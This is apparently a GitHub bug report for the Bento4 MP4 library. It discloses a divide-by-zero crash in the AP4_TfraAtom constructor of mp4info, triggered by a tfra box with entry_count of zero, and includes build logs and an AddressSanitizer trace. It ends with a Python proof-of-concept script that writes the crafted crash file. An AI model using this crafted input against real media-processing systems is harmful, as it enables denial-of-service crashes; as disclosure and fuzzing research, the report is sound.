Bug: AddressSanitizer FPE in AP4_TfraAtom constructor of mp4info (caused by entry_count = 0) #1029
Description
Hi, we find a possible vulnerabiltiy in the latest version of Bento4.
Environment
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ gcc --version
gcc (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.2 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logoReproduction
Step
git clone [email protected]:axiomatic-systems/Bento4.git
cd ./Bento4
mkdir -p build && cd build
cmake .. \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
make -j$(nproc)
./mp4info tfra_div_zero.mp4Reproduction output
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ git clone [email protected]:axiomatic-systems/Bento4.git
Cloning into 'Bento4'...
remote: Enumerating objects: 14906, done.
remote: Counting objects: 100% (570/570), done.
remote: Compressing objects: 100% (196/196), done.
remote: Total 14906 (delta 464), reused 376 (delta 374), pack-reused 14336 (from 3)
Receiving objects: 100% (14906/14906), 48.05 MiB | 67.00 KiB/s, done.
Resolving deltas: 100% (10403/10403), done.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ cd ./Bento4
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4$ mkdir -p build && cd build
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ cmake .. \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
-- The C compiler identification is GNU 13.3.0
-- The CXX compiler identification is GNU 13.3.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done (1.0s)
-- Generating done (0.1s)
-- Build files have been written to: /home/zhicheng/FuzzDriverGen/findreal/Bento4/build
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ make -j$(nproc)
[ 0%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Ac3Parser.cpp.o
[ 1%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Ac4Parser.cpp.o
[ 1%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4AdtsParser.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4AvcParser.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4BitStream.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4HevcParser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Eac3Parser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4NalParser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap48bdlAtom.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Mp4AudioInfo.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Ac4Utils.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AinfAtom.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AtomSampleTable.cpp.o
[ 8%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Atom.cpp.o
[ 8%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AtomFactory.cpp.o
[ 9%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Av1cAtom.cpp.o
[ 10%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ByteStream.cpp.o
[ 10%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4BlocAtom.cpp.o
[ 11%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AvccAtom.cpp.o
[ 11%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Co64Atom.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CommandFactory.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Command.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CommonEncryption.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CttsAtom.cpp.o
[ 13%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ContainerAtom.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DataBuffer.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dac3Atom.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dac4Atom.cpp.o
[ 16%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Debug.cpp.o
[ 16%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dec3Atom.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DecoderConfigDescriptor.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DecoderSpecificInfoDescriptor.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DescriptorFactory.cpp.o
[ 18%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Descriptor.cpp.o
[ 19%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DrefAtom.cpp.o
[ 19%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DvccAtom.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ElstAtom.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Expandable.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4EsDescriptor.cpp.o
[ 21%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4EsdsAtom.cpp.o
[ 22%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4File.cpp.o
[ 23%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FileCopier.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FragmentSampleTable.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FrmaAtom.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FileWriter.cpp.o
[ 25%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FtypAtom.cpp.o
[ 25%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4GrpiAtom.cpp.o
[ 26%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HintTrackReader.cpp.o
[ 26%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HdlrAtom.cpp.o
[ 27%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HmhdAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IkmsAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HvccAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IodsAtom.cpp.o
[ 29%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Ipmp.cpp.o
[ 30%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IproAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsfmAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsltAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsmaCryp.cpp.o
[ 32%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4LinearReader.cpp.o
[ 32%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Marlin.cpp.o
[ 33%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MdhdAtom.cpp.o
[ 33%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MehdAtom.cpp.o
[ 34%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MfhdAtom.cpp.o
[ 34%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MfroAtom.cpp.o
[ 35%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MoovAtom.cpp.o
[ 35%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Movie.cpp.o
[ 36%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MovieFragment.cpp.o
[ 36%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Mpeg2Ts.cpp.o
[ 37%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MvhdAtom.cpp.o
[ 38%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4NmhdAtom.cpp.o
[ 38%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ObjectDescriptor.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OdafAtom.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OddaAtom.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OhdrAtom.cpp.o
[ 40%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OdheAtom.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OmaDcf.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4PdinAtom.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Processor.cpp.o
[ 42%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Piff.cpp.o
[ 43%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Protection.cpp.o
[ 43%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4PsshAtom.cpp.o
[ 44%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Results.cpp.o
[ 45%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4RtpAtom.cpp.o
[ 45%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4RtpHint.cpp.o
[ 46%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SLConfigDescriptor.cpp.o
[ 46%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SaioAtom.cpp.o
[ 47%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SaizAtom.cpp.o
[ 47%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Sample.cpp.o
[ 48%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleDescription.cpp.o
[ 48%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleEntry.cpp.o
[ 49%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleSource.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SbgpAtom.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleTable.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SchmAtom.cpp.o
[ 51%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SdpAtom.cpp.o
[ 51%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SegmentBuilder.cpp.o
[ 52%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SencAtom.cpp.o
[ 53%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SgpdAtom.cpp.o
[ 53%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SidxAtom.cpp.o
[ 54%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SmhdAtom.cpp.o
[ 54%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StcoAtom.cpp.o
[ 55%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SthdAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StscAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4String.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StsdAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StszAtom.cpp.o
[ 57%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StssAtom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SttsAtom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Stz2Atom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TencAtom.cpp.o
[ 59%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SyntheticSampleTable.cpp.o
[ 60%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfdtAtom.cpp.o
[ 61%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfhdAtom.cpp.o
[ 61%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfraAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TimsAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TkhdAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrakAtom.cpp.o
[ 63%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Track.cpp.o
[ 64%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrefTypeAtom.cpp.o
[ 64%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrexAtom.cpp.o
[ 65%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrunAtom.cpp.o
[ 65%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4UrlAtom.cpp.o
[ 66%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Utils.cpp.o
[ 66%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4UuidAtom.cpp.o
[ 67%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4VmhdAtom.cpp.o
[ 67%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4VpccAtom.cpp.o
[ 68%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4AesBlockCipher.cpp.o
[ 69%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4Hmac.cpp.o
[ 69%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4KeyWrap.cpp.o
[ 70%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4StreamCipher.cpp.o
[ 70%] Building CXX object CMakeFiles/ap4.dir/Source/C++/MetaData/Ap4MetaData.cpp.o
[ 71%] Building CXX object CMakeFiles/ap4.dir/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp.o
[ 71%] Building CXX object CMakeFiles/ap4.dir/Source/C++/System/Posix/Ap4PosixRandom.cpp.o
[ 72%] Linking CXX static library libap4.a
[ 72%] Built target ap4
[ 72%] Building CXX object CMakeFiles/fixaacsampledescription.dir/Source/C++/Apps/FixAacSampleDescription/FixAacSampleDescription.cpp.o
[ 73%] Building CXX object CMakeFiles/avcinfo.dir/Source/C++/Apps/AvcInfo/AvcInfo.cpp.o
[ 73%] Building CXX object CMakeFiles/mp42aac.dir/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp.o
[ 73%] Building CXX object CMakeFiles/aac2mp4.dir/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp.o
[ 76%] Building CXX object CMakeFiles/mp42hevc.dir/Source/C++/Apps/Mp42Hevc/Mp42Hevc.cpp.o
[ 77%] Building CXX object CMakeFiles/mp42avc.dir/Source/C++/Apps/Mp42Avc/Mp42Avc.cpp.o
[ 76%] Building CXX object CMakeFiles/mp4diff.dir/Source/C++/Apps/Mp4Diff/Mp4Diff.cpp.o
[ 77%] Building CXX object CMakeFiles/mp4dcfpackager.dir/Source/C++/Apps/Mp4DcfPackager/Mp4DcfPackager.cpp.o
[ 77%] Building CXX object CMakeFiles/hevcinfo.dir/Source/C++/Apps/HevcInfo/HevcInfo.cpp.o
[ 77%] Building CXX object CMakeFiles/mp4audioclip.dir/Source/C++/Apps/Mp4AudioClip/Mp4AudioClip.cpp.o
[ 78%] Building CXX object CMakeFiles/mp42ts.dir/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp.o
[ 79%] Building CXX object CMakeFiles/mp42hls.dir/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp.o
[ 79%] Building CXX object CMakeFiles/mp4fragment.dir/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp.o
[ 79%] Building CXX object CMakeFiles/mp4extract.dir/Source/C++/Apps/Mp4Extract/Mp4Extract.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4compact.dir/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4edit.dir/Source/C++/Apps/Mp4Edit/Mp4Edit.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4encrypt.dir/Source/C++/Apps/Mp4Encrypt/Mp4Encrypt.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4decrypt.dir/Source/C++/Apps/Mp4Decrypt/Mp4Decrypt.cpp.o
[ 81%] Building CXX object CMakeFiles/mp4iframeindex.dir/Source/C++/Apps/Mp4IframeIndex/Mp4IframeIndex.cpp.o
[ 82%] Building CXX object CMakeFiles/mp4info.dir/Source/C++/Apps/Mp4Info/Mp4Info.cpp.o
[ 82%] Building CXX object CMakeFiles/mp4dump.dir/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp.o
[ 84%] Building CXX object CMakeFiles/mp4tag.dir/Source/C++/Apps/Mp4Tag/Mp4Tag.cpp.o
[ 84%] Building CXX object CMakeFiles/mp4split.dir/Source/C++/Apps/Mp4Split/Mp4Split.cpp.o
[ 85%] Building CXX object CMakeFiles/mp4pssh.dir/Source/C++/Apps/Mp4Pssh/Mp4Pssh.cpp.o
[ 86%] Building CXX object CMakeFiles/mp4mux.dir/Source/C++/Apps/Mp4Mux/Mp4Mux.cpp.o
[ 87%] Building CXX object CMakeFiles/mp4rtphintinfo.dir/Source/C++/Apps/Mp4RtpHintInfo/Mp4RtpHintInfo.cpp.o
[ 88%] Linking CXX executable hevcinfo
[ 89%] Linking CXX executable mp4extract
[ 89%] Linking CXX executable mp4rtphintinfo
[ 89%] Linking CXX executable mp4audioclip
[ 90%] Linking CXX executable aac2mp4
[ 90%] Linking CXX executable mp42aac
[ 91%] Linking CXX executable fixaacsampledescription
[ 92%] Linking CXX executable avcinfo
[ 93%] Linking CXX executable mp4diff
[ 93%] Linking CXX executable mp4compact
[ 94%] Linking CXX executable mp4decrypt
[ 94%] Linking CXX executable mp4iframeindex
[ 95%] Linking CXX executable mp4dcfpackager
[ 95%] Linking CXX executable mp42avc
[ 96%] Linking CXX executable mp4dump
[ 96%] Linking CXX executable mp42hevc
[ 96%] Linking CXX executable mp4pssh
[ 97%] Linking CXX executable mp4edit
[ 97%] Linking CXX executable mp4split
[ 97%] Built target hevcinfo
[ 97%] Linking CXX executable mp42ts
[ 97%] Built target avcinfo
[ 98%] Built target mp4audioclip
[ 98%] Linking CXX executable mp4encrypt
[ 98%] Built target mp4rtphintinfo
[ 98%] Built target mp4extract
[ 98%] Built target aac2mp4
[ 98%] Built target fixaacsampledescription
[ 98%] Built target mp42aac
[ 98%] Built target mp4iframeindex
[ 98%] Built target mp4compact
[ 98%] Built target mp4decrypt
[ 98%] Built target mp4diff
[ 98%] Built target mp4dcfpackager
[ 98%] Built target mp42avc
[ 98%] Built target mp4dump
[ 98%] Built target mp42hevc
[ 98%] Built target mp4edit
[ 98%] Built target mp4pssh
[ 98%] Built target mp4split
[ 99%] Linking CXX executable mp4tag
[ 99%] Built target mp42ts
[ 99%] Built target mp4encrypt
[ 99%] Built target mp4tag
[ 99%] Linking CXX executable mp42hls
[100%] Linking CXX executable mp4fragment
[100%] Built target mp42hls
[100%] Linking CXX executable mp4info
[100%] Built target mp4fragment
[100%] Linking CXX executable mp4mux
[100%] Built target mp4info
[100%] Built target mp4mux
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ ./mp4info tfra_div_zero.mp4
AddressSanitizer:DEADLYSIGNAL
=================================================================
==45388==ERROR: AddressSanitizer: FPE on unknown address 0x58c8771312a5 (pc 0x58c8771312a5 bp 0x7ffd31c607b0 sp 0x7ffd31c605c0 T0)
#0 0x58c8771312a5 in AP4_TfraAtom::AP4_TfraAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4TfraAtom.cpp:153
#1 0x58c8771323c4 in AP4_TfraAtom::Create(unsigned int, AP4_ByteStream&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4TfraAtom.cpp:53
#2 0x58c8770a683c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:443
#3 0x58c8770a3ce5 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#4 0x58c8770a4587 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#5 0x58c8770c9e47 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:104
#6 0x58c8770ca3c0 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:78
#7 0x58c87708c2c3 in main /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1902
#8 0x7689c2e2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#9 0x7689c2e2a28a in __libc_start_main_impl ../csu/libc-start.c:360
#10 0x58c8770808a4 in _start (/home/zhicheng/FuzzDriverGen/findreal/Bento4/build/mp4info+0x368a4) (BuildId: 71df3ed251bddc9ce62525188d1a134b33cf77a7)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4TfraAtom.cpp:153 in AP4_TfraAtom::AP4_TfraAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&)
==45388==ABORTINGPoC
You can use the following script to generate a PoC.
import struct
def build_poc(path: str = "tfra_div_zero.mp4") -> None:
buf = bytearray()
# -------------------------------
# 1. ftyp box (20 bytes total)
# -------------------------------
buf += struct.pack(">I4s", 20, b"ftyp") # size, type
buf += b"isom" # major_brand
buf += struct.pack(">I", 0x00000200) # minor_version
buf += b"iso2" # compatible_brand[0]
# -------------------------------
# 2. tfra box (24 bytes total)
# -------------------------------
buf += struct.pack(">I4s", 24, b"tfra") # size, type
buf += struct.pack(">I", 0x00000000) # version=0, flags=0
buf += struct.pack(">I", 1) # track_ID = 1
buf += struct.pack(">I", 0x00000000) # reserved + length‑size bits
buf += struct.pack(">I", 0) # entry_count = **0** ← crash
with open(path, "wb") as fp:
fp.write(buf)
print(f"[+] PoC written to {path} ({len(buf)} bytes)")
if __name__ == "__main__":
build_poc()You also can download the file below.
tfra_div_zero.mp4